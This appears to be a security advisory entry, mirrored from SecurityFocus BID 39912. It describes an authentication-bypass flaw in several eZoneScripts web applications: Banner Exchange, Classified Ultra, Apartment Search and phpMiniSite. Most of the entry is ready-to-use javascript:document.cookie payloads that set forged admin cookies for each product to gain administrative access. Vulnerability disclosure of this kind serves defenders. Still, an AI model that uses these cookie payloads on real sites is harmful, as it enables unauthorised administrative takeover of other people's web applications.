27 lines
No EOL
1 KiB
Text
27 lines
No EOL
1 KiB
Text
source: https://www.securityfocus.com/bid/39912/info
|
|
|
|
eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.
|
|
|
|
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
|
|
|
|
The following example cookie data is available:
|
|
|
|
Banner Exchange Website and Adult Banner Exchange Website:
|
|
|
|
javascript:document.cookie="bannerexchangename=admin; path=/";
|
|
javascript:document.cookie="bannerexchangerand=905; path=/";
|
|
|
|
|
|
Classified Ultra Script:
|
|
|
|
javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
|
|
|
|
|
|
Apartment Search Script:
|
|
|
|
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
|
|
|
|
|
|
phpMiniSite Script:
|
|
|
|
javascript:document.cookie="auth=fook; path=/"; |